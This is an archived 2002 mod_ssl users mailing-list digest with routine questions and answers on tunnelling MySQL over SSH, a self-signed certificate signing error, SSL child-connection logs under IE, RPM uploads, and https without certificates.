modssl is not really what you want, an SSL enabled web server wont do much for the PHP-MySQL connection. Rather I think you'd want an SSL enabled MySQL, you can make then an SSL MySQL client and server but not sure how then PHP would make use of that...it might be easier to simply set up a secure tunnel to the remote server if you have SSH on the server, this would be simple to set up and simple to program for. http://www.mysql.com/doc/S/e/Security.html http://www.mysql.com/doc/S/e/Secure_connections.html Didnt personally try compiling an SSL MySQL, but should be "fairly" straight forward. To set up a tunnel get an SSH client and activate port forwarding from the server:3306 to whatever local port you wish to run that MySQL session on. By doing this you can also disable the external MySQL accounts (e.g. root@%) as it uses the SSH session, therefore you could even block off port 3306 to the outside. Nick Quoting ®pÛu : > Dear All: > > I use PHP to access remote MySQL database, > and I wish build SSL on their connection. > My web server is Apache 1.3.23 > > I know programing,but I don't know how to begin. > Can anybody help me. Just tell me how to begin. > Thank a lot. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 09:47:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA18847; Thu, 28 Mar 2002 09:46:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA18824; Thu, 28 Mar 2002 09:45:16 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 6F29A4CE61C; Thu, 28 Mar 2002 09:45:15 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2S8Dqw97410; Thu, 28 Mar 2002 09:13:52 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns-zero1.technologue.co.jp id DAA10524; Thu, 28 Mar 2002 03:20:45 +0100 (MET) From: yaz@technologue.jp Received: (from root@localhost) by ns-zero1.technologue.co.jp (8.11.6/8.11.3) id g2S2KiY19426 for modssl-users@modssl.org; Thu, 28 Mar 2002 11:20:44 +0900 Received: from technologue.jp (10.in.technologue.jp [192.168.1.10] (may be forged)) by ns-zero1.technologue.co.jp (8.11.6/8.11.6) with ESMTP id g2S2KdU19419 for ; Thu, 28 Mar 2002 11:20:39 +0900 Message-ID: <3CA27DF7.8010607@technologue.jp> Date: Thu, 28 Mar 2002 11:20:39 +0900 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.9) Gecko/20020311 X-Accept-Language: en,ja MIME-Version: 1.0 To: modssl-users@modssl.org Subject: mod_ssl contrib Content-Type: text/plain; charset=ISO-2022-JP Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: yaz@technologue.jp X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi there, I've uploaded these RPMs: apache-mod_ssl-1.3.24.2.8.8-1tlg.i386.rpm apache-mod_ssl-devel-1.3.24.2.8.8-1tlg.i386.rpm apache-mod_ssl-manual-1.3.24.2.8.8-1tlg.i386.rpm apache-mod_ssl-1.3.24.2.8.8-1tlg.src.rpm Thank you, Yaz -- Yasushi "Yaz" FUJITA yaz@technologue.jp ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 09:47:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA18850; Thu, 28 Mar 2002 09:46:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA18827; Thu, 28 Mar 2002 09:45:16 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 954CA4CE741; Thu, 28 Mar 2002 09:45:15 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2S8DT197398; Thu, 28 Mar 2002 09:13:29 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtpout.mac.com id VAA11431; Wed, 27 Mar 2002 21:22:08 +0100 (MET) Received: from smtp-relay01.mac.com (server-source-si02 [10.13.10.6]) by smtpout.mac.com (8.12.1/8.10.2/1.0) with ESMTP id g2RKM6rO012440 for ; Wed, 27 Mar 2002 12:22:06 -0800 (PST) Received: from asmtp01.mac.com ([10.13.10.65]) by smtp-relay01.mac.com (Netscape Messaging Server 4.15 relay01 Jun 21 2001 23:53:48) with ESMTP id GTNF8T00.83C for ; Wed, 27 Mar 2002 12:22:05 -0800 Received: from [66.177.96.48] ([66.177.96.48]) by asmtp01.mac.com (Netscape Messaging Server 4.15 asmtp01 Jun 21 2001 23:53:48) with ESMTP id GTNF8S00.L79 for ; Wed, 27 Mar 2002 12:22:04 -0800 User-Agent: Microsoft-Entourage/10.0.0.1331 Date: Wed, 27 Mar 2002 15:22:02 -0500 Subject: Signing ? From: Bill -Sx- Jones To: Message-ID: In-Reply-To: <3C124172E7FDD511B510000347426D592DD6DB@exchange.epr.com> Mime-version: 1.0 X-Sender: -Sx- IUDICIUM X-Origin: OuterLimits Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bill -Sx- Jones X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Using this procedure: cd / openssl md5 * > /private/var/root/rand.dat cd /private/var/root/ openssl genrsa -des3 -out server.key -rand rand.dat 1024 openssl req -new -key server.key -out server.csr openssl genrsa -des3 -out ca.key -rand rand.dat 1024 openssl req -new -x509 -days 365 -key ca.key -out ca.crt /private/var/root/sign.sh server.csr On Platform: Apache 1.3.22, MacOS X 10.1.3 - self signing error ? I get - Check that the request matches the signature Signature ok The Subjects Distinguished Name is as follows countryName :PRINTABLE:'US' stateOrProvinceName :PRINTABLE:'Florida' localityName :PRINTABLE:'Jacksonville' organizationName :PRINTABLE:'FCCJ' organizationalUnitName:PRINTABLE:'courseware support' commonName :PRINTABLE:'sneex.fccj.edu' emailAddress :IA5STRING:'sneex@fccj.edu' Certificate is to be certified until Mar 27 20:13:54 2003 GMT (365 days) Sign the certificate? [y/n]:y 1 out of 1 certificate requests certified, commit? [y/n]y Write out database with 1 new entries Data Base Updated CA verifying: server.crt <-> CA cert server.crt: /C=US/ST=Florida/L=Jacksonville/O=FCCJ/OU=courseware support/CN=sneex.fccj.edu/Email=sneex@fccj.edu error 18 at 0 depth lookup:self signed certificate /C=US/ST=Florida/L=Jacksonville/O=FCCJ/OU=courseware support/CN=sneex.fccj.edu/Email=sneex@fccj.edu error 7 at 0 depth lookup:certificate signature failure Is this an error I can ignore? If not, how can I fix it? BTW - The clients I have tried all fail to connect to 443 ... Help? -Sx- :] ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 09:47:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA18857; Thu, 28 Mar 2002 09:46:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA18828; Thu, 28 Mar 2002 09:45:17 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id AE2864CE755; Thu, 28 Mar 2002 09:45:15 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2S8Dcm97404; Thu, 28 Mar 2002 09:13:38 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from [207.208.149.138] id XAA17855; Wed, 27 Mar 2002 23:10:43 +0100 (MET) Received: from natasha.swc.com by [207.208.149.138] via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 27 Mar 2002 22:10:43 UT Received: by natasha.swc.com with Internet Mail Service (5.5.2650.21) id ; Wed, 27 Mar 2002 15:58:34 -0600 Message-ID: From: Terry Ziemniak To: "'modssl-users@modssl.org'" Subject: SSL - How many children should I have??? Date: Wed, 27 Mar 2002 15:58:31 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1D5DA.88AB7E90" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Terry Ziemniak X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1D5DA.88AB7E90 Content-Type: text/plain I am having problems with an NT4.0 box running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32. >From an IE 6 (and 5 also) client, the first time that I run through some pages on my companies home grown java based web site, I get the non-descript 'IE can not find page error' (almost immediately) after running a given function. However if I go back to one page and resubmit it, it will run fine. And from then on it runs fine. When I set the ssl logging to debug, I notice that there are two children connections at one time (associated with my workstation 207.208.157.117) when it fails. See log below (failure occurred at 11:51:39)... When I am successful (in this case just backing up and re-submitting the page), I only have one child connection. See log below (the last 6 transactions). Is this normal? Can anyone offer any insight to this problem? If it is not a problem with the child count, what other possibilities are there? Thanks in advanced. [27/Mar/2002 11:50:46 01624] [info] Connection to child 0 established (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:50:46 01624] [info] Seeding PRNG with 0 bytes of entropy [27/Mar/2002 11:50:46 01624] [info] Connection: Client IP: 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [27/Mar/2002 11:50:46 01624] [info] Connection to child 0 closed with standard shutdown (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:50:48 01624] [info] Connection to child 1 established (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:50:48 01624] [info] Seeding PRNG with 0 bytes of entropy [27/Mar/2002 11:50:51 01624] [info] Connection: Client IP: 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [27/Mar/2002 11:50:51 01624] [info] Initial (No.1) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:50:52 01624] [info] Connection to child 3 established (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:50:52 01624] [info] Seeding PRNG with 0 bytes of entropy [27/Mar/2002 11:50:52 01624] [info] Connection: Client IP: 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [27/Mar/2002 11:50:52 01624] [info] Initial (No.1) HTTPS request received for child 3 (server www.mysite.com:8081) [27/Mar/2002 11:50:53 01624] [info] Subsequent (No.2) HTTPS request received for child 3 (server www.mysite.com:8081) [27/Mar/2002 11:50:53 01624] [info] Subsequent (No.2) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:50:53 01624] [info] Subsequent (No.3) HTTPS request received for child 3 (server www.mysite.com:8081) [27/Mar/2002 11:50:54 01624] [info] Subsequent (No.3) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:50:54 01624] [info] Subsequent (No.4) HTTPS request received for child 3 (server www.mysite.com:8081) [27/Mar/2002 11:50:54 01624] [info] Subsequent (No.4) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:50:54 01624] [info] Subsequent (No.5) HTTPS request received for child 3 (server www.mysite.com:8081) [27/Mar/2002 11:50:58 01624] [info] Subsequent (No.5) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:50:58 01624] [info] Subsequent (No.6) HTTPS request received for child 3 (server www.mysite.com:8081) [27/Mar/2002 11:50:59 01624] [info] Connection to child 3 closed with standard shutdown (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:50:59 01624] [info] Connection to child 5 established (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:50:59 01624] [info] Seeding PRNG with 0 bytes of entropy [27/Mar/2002 11:51:02 01624] [info] Connection: Client IP: 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [27/Mar/2002 11:51:02 01624] [info] Initial (No.1) HTTPS request received for child 5 (server www.mysite.com:8081) [27/Mar/2002 11:51:10 01624] [info] Subsequent (No.6) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:51:10 01624] [info] Subsequent (No.2) HTTPS request received for child 5 (server www.mysite.com:8081) [27/Mar/2002 11:51:10 01624] [info] Connection to child 5 closed with standard shutdown (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:51:10 01624] [info] Subsequent (No.7) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:51:10 01624] [info] Subsequent (No.8) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:51:11 01624] [info] Connection to child 7 established (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:51:11 01624] [info] Seeding PRNG with 0 bytes of entropy [27/Mar/2002 11:51:11 01624] [info] Connection: Client IP: 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [27/Mar/2002 11:51:11 01624] [info] Initial (No.1) HTTPS request received for child 7 (server www.mysite.com:8081) [27/Mar/2002 11:51:16 01624] [info] Subsequent (No.2) HTTPS request received for child 7 (server www.mysite.com:8081) [27/Mar/2002 11:51:16 01624] [info] Subsequent (No.9) HTTPS request received for child 1 (server www.mysite.com:8081) [27/Mar/2002 11:51:16 01624] [info] Connection to child 1 closed with standard shutdown (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:51:17 01624] [info] Subsequent (No.3) HTTPS request received for child 7 (server www.mysite.com:8081) [27/Mar/2002 11:51:17 01624] [info] Subsequent (No.4) HTTPS request received for child 7 (server www.mysite.com:8081) [27/Mar/2002 11:51:20 01624] [info] Subsequent (No.5) HTTPS request received for child 7 (server www.mysite.com:8081) [27/Mar/2002 11:51:20 01624] [info] Connection to child 9 established (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:51:20 01624] [info] Seeding PRNG with 0 bytes of entropy [27/Mar/2002 11:51:21 01624] [info] Connection: Client IP: 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [27/Mar/2002 11:51:21 01624] [info] Initial (No.1) HTTPS request received for child 9 (server www.mysite.com:8081) [27/Mar/2002 11:51:21 01624] [info] Subsequent (No.6) HTTPS request received for child 7 (server www.mysite.com:8081) [27/Mar/2002 11:51:23 01624] [info] Subsequent (No.2) HTTPS request received for child 9 (server www.mysite.com:8081) [27/Mar/2002 11:51:23 01624] [info] Subsequent (No.7) HTTPS request received for child 7 (server www.mysite.com:8081) [27/Mar/2002 11:51:38 01624] [info] Connection to child 7 closed with standard shutdown (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:51:39 01624] [info] Connection to child 9 closed with standard shutdown (server www.mysite.com:8081, client 207.208.157.117) ** Above is the end of the failed attempt. ** Below is where I resubmitted the page successfully. [27/Mar/2002 11:53:33 01624] [info] Connection to child 4 established (server www.mysite.com:8081, client 207.208.157.117) [27/Mar/2002 11:53:33 01624] [info] Seeding PRNG with 0 bytes of entropy [27/Mar/2002 11:53:33 01624] [info] Connection: Client IP: 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) [27/Mar/2002 11:53:33 01624] [info] Initial (No.1) HTTPS request received for child 4 (server www.mysite.com:8081) [27/Mar/2002 11:53:34 01624] [info] Subsequent (No.2) HTTPS request received for child 4 (server www.mysite.com:8081) [27/Mar/2002 11:53:49 01624] [info] Connection to child 4 closed with standard shutdown (server www.mysite.com:8081, client 207.208.157.117) Terry Ziemniak Terry.Ziemniak@SWC.com ------_=_NextPart_001_01C1D5DA.88AB7E90 Content-Type: text/html Content-Transfer-Encoding: quoted-printable

I am having problems with an NT4.0 box running = Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.

 

From an IE 6 (and 5 also) client, the first time = that I run through some pages on my companies home grown java based web site, I = get the non-descript 'IE can not find page error' (almost immediately) after running a given function.  However = if I go back to one page and resubmit it, it will run fine.  And from then on it runs = fine.

 

When I set the ssl logging to debug, I notice that = there are two children connections at one time (associated with my workstation 207.208.157.117) when it fails.  = See log below (failure occurred at 11:51:39)...

 

When I am successful (in this case just backing up = and re-submitting the page), I only have one child connection.  See log below (the last 6 = transactions).

 

Is this normal?  Can anyone offer any insight to this problem?  If it is not a problem with = the child count, what other possibilities are there?

 

Thanks in advanced.

 

[27/Mar/2002 11:50:46 01624] [info]  Connection to child 0 = established (server www.mysite.com:8081, client 207.208.157.117)   =

[27/Mar/2002 11:50:46 01624] [info]  Seeding PRNG with 0 bytes of entropy   =

[27/Mar/2002 11:50:46 01624] [info]  Connection: Client IP: = 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)   =

[27/Mar/2002 11:50:46 01624] [info]  Connection to child 0 closed = with standard shutdown (server www.mysite.com:8081, client = 207.208.157.117)   =

[27/Mar/2002 11:50:48 01624] [info]  Connection to child 1 = established (server www.mysite.com:8081, client 207.208.157.117)   =

[27/Mar/2002 11:50:48 01624] [info]  Seeding PRNG with 0 bytes of entropy   =

[27/Mar/2002 11:50:51 01624] [info]  Connection: Client IP: = 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)   =

[27/Mar/2002 11:50:51 01624] [info]  Initial (No.1) HTTPS request = received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:52 01624] [info]  Connection to child 3 = established (server www.mysite.com:8081, client 207.208.157.117)   =

[27/Mar/2002 11:50:52 01624] [info]  Seeding PRNG with 0 bytes of entropy   =

[27/Mar/2002 11:50:52 01624] [info]  Connection: Client IP: = 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)   =

[27/Mar/2002 11:50:52 01624] [info]  Initial (No.1) HTTPS request = received for child 3 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:53 01624] [info]  Subsequent (No.2) HTTPS = request received for child 3 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:53 01624] [info]  Subsequent (No.2) HTTPS = request received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:53 01624] [info]  Subsequent (No.3) HTTPS = request received for child 3 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:54 01624] [info]  Subsequent (No.3) HTTPS = request received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:54 01624] [info]  Subsequent (No.4) HTTPS = request received for child 3 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:54 01624] [info]  Subsequent (No.4) HTTPS = request received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:54 01624] [info]  Subsequent (No.5) HTTPS = request received for child 3 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:58 01624] [info]  Subsequent (No.5) HTTPS = request received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:58 01624] [info]  Subsequent (No.6) HTTPS = request received for child 3 (server www.mysite.com:8081)   =

[27/Mar/2002 11:50:59 01624] [info]  Connection to child 3 closed = with standard shutdown (server www.mysite.com:8081, client = 207.208.157.117)   =

[27/Mar/2002 11:50:59 01624] [info]  Connection to child 5 = established (server www.mysite.com:8081, client 207.208.157.117)   =

[27/Mar/2002 11:50:59 01624] [info]  Seeding PRNG with 0 bytes of = entropy   =

[27/Mar/2002 11:51:02 01624] [info]  Connection: Client IP: = 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)   =

[27/Mar/2002 11:51:02 01624] [info]  Initial (No.1) HTTPS request = received for child 5 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:10 01624] [info]  Subsequent (No.6) HTTPS = request received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:10 01624] [info]  Subsequent (No.2) HTTPS = request received for child 5 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:10 01624] [info]  Connection to child 5 closed = with standard shutdown (server www.mysite.com:8081, client = 207.208.157.117)   =

[27/Mar/2002 11:51:10 01624] [info]  Subsequent (No.7) HTTPS = request received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:10 01624] [info]  Subsequent (No.8) HTTPS = request received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:11 01624] [info]  Connection to child 7 = established (server www.mysite.com:8081, client 207.208.157.117)   =

[27/Mar/2002 11:51:11 01624] [info]  Seeding PRNG with 0 bytes of entropy   =

[27/Mar/2002 11:51:11 01624] [info]  Connection: Client IP: = 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)   =

[27/Mar/2002 11:51:11 01624] [info]  Initial (No.1) HTTPS request = received for child 7 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:16 01624] [info]  Subsequent (No.2) HTTPS = request received for child 7 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:16 01624] [info]  Subsequent (No.9) HTTPS = request received for child 1 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:16 01624] [info]  Connection to child 1 closed = with standard shutdown (server www.mysite.com:8081, client = 207.208.157.117)   =

[27/Mar/2002 11:51:17 01624] [info]  Subsequent (No.3) HTTPS = request received for child 7 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:17 01624] [info]  Subsequent (No.4) HTTPS = request received for child 7 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:20 01624] [info]  Subsequent (No.5) HTTPS = request received for child 7 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:20 01624] [info]  Connection to child 9 = established (server www.mysite.com:8081, client 207.208.157.117)   =

[27/Mar/2002 11:51:20 01624] [info]  Seeding PRNG with 0 bytes of entropy   =

[27/Mar/2002 11:51:21 01624] [info]  Connection: Client IP: = 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)   =

[27/Mar/2002 11:51:21 01624] [info]  Initial (No.1) HTTPS request = received for child 9 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:21 01624] [info]  Subsequent (No.6) HTTPS = request received for child 7 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:23 01624] [info]  Subsequent (No.2) HTTPS = request received for child 9 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:23 01624] [info]  Subsequent (No.7) HTTPS = request received for child 7 (server www.mysite.com:8081)   =

[27/Mar/2002 11:51:38 01624] [info]  Connection to child 7 closed = with standard shutdown (server www.mysite.com:8081, client = 207.208.157.117)   =

[27/Mar/2002 11:51:39 01624] [info]  Connection to child 9 closed = with standard shutdown (server www.mysite.com:8081, client = 207.208.157.117)   =

** Above is the end of the failed = attempt.

** Below is where I resubmitted the page = successfully.

[27/Mar/2002 11:53:33 01624] [info]  Connection to child 4 = established (server www.mysite.com:8081, client 207.208.157.117)   =

[27/Mar/2002 11:53:33 01624] [info]  Seeding PRNG with 0 bytes of entropy   =

[27/Mar/2002 11:53:33 01624] [info]  Connection: Client IP: = 207.208.157.117, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)   =

[27/Mar/2002 11:53:33 01624] [info]  Initial (No.1) HTTPS request = received for child 4 (server www.mysite.com:8081)   =

[27/Mar/2002 11:53:34 01624] [info]  Subsequent (No.2) HTTPS = request received for child 4 (server www.mysite.com:8081)   =

[27/Mar/2002 11:53:49 01624] [info]  Connection to child 4 closed = with standard shutdown (server www.mysite.com:8081, client = 207.208.157.117)   =

 

Terry Ziemniak

Terry.Ziemniak@SWC.com=

 

------_=_NextPart_001_01C1D5DA.88AB7E90-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 10:14:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA21019; Thu, 28 Mar 2002 10:13:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA20969; Thu, 28 Mar 2002 10:12:24 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id C3DE34CE620; Thu, 28 Mar 2002 10:12:23 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2S8sR798648; Thu, 28 Mar 2002 09:54:27 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mf1.bredband.net id IAA16148; Thu, 28 Mar 2002 08:40:52 +0100 (MET) Received: from bredband.net ([213.114.53.88]) by mf1.bredband.net with ESMTP id <20020328073934.DVGT19650.mf1@bredband.net> for ; Thu, 28 Mar 2002 08:39:34 +0100 Message-ID: <3CA2C869.5F64C2@bredband.net> Date: Thu, 28 Mar 2002 08:38:17 +0100 From: Mikael Pettersson X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Build SSL on Access Remote Database References: <001601c1d5c4$e97b9020$7665808c@youandme> <1017285956.3ca28d44276b1@webmail.regiocom.net> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mikael Pettersson X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Check this article : http://www.devshed.com/Server_Side/PHP/SoothinglySeamless/page1.html They are using *Apache *mod_ssl *openssl *php *mysql /Micke Nick Miles wrote: > I think modssl is not really what you want, an SSL enabled web server wont do > much for the PHP-MySQL connection. > > Rather I think you'd want an SSL enabled MySQL, you can make then an SSL MySQL > client and server but not sure how then PHP would make use of that...it might > be easier to simply set up a secure tunnel to the remote server if you have SSH > on the server, this would be simple to set up and simple to program for. > > http://www.mysql.com/doc/S/e/Security.html > http://www.mysql.com/doc/S/e/Secure_connections.html > > Didnt personally try compiling an SSL MySQL, but should be "fairly" straight > forward. To set up a tunnel get an SSH client and activate port forwarding > from the server:3306 to whatever local port you wish to run that MySQL session > on. By doing this you can also disable the external MySQL accounts (e.g. > root@%) as it uses the SSH session, therefore you could even block off port > 3306 to the outside. > > Nick > > Quoting ®pÛu : > > > Dear All: > > > > I use PHP to access remote MySQL database, > > and I wish build SSL on their connection. > > My web server is Apache 1.3.23 > > > > I know programing,but I don't know how to begin. > > Can anybody help me. Just tell me how to begin. > > Thank a lot. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 13:41:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA04376; Thu, 28 Mar 2002 13:40:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id NAA04315; Thu, 28 Mar 2002 13:39:09 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 55D794CE751; Thu, 28 Mar 2002 13:39:09 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2SBII601425; Thu, 28 Mar 2002 12:18:18 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp012.mail.yahoo.com id LAA27586; Thu, 28 Mar 2002 11:55:23 +0100 (MET) Received: from unknown (HELO RADIOHEAD) (brucealansmith@217.206.128.251 with login) by smtp.mail.vip.sc5.yahoo.com with SMTP; 28 Mar 2002 10:55:21 -0000 From: "Bruce Smith" To: Subject: Using https without certificates Date: Thu, 28 Mar 2002 10:55:41 -0000 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000C_01C1D647.1A72D580" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bruce Smith" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_000C_01C1D647.1A72D580 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Can anyone out there explain how (/whether ?) I can configure mod_ssl so that I can use https for encryption without needing to use certificates ? Thanks, Bruce Smith ------=_NextPart_000_000C_01C1D647.1A72D580 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Can = anyone out there=20 explain how (/whether ?) I can configure mod_ssl so that I can use = https=20 for encryption without needing to use certificates ?
Thanks,
Bruce Smith
 
 
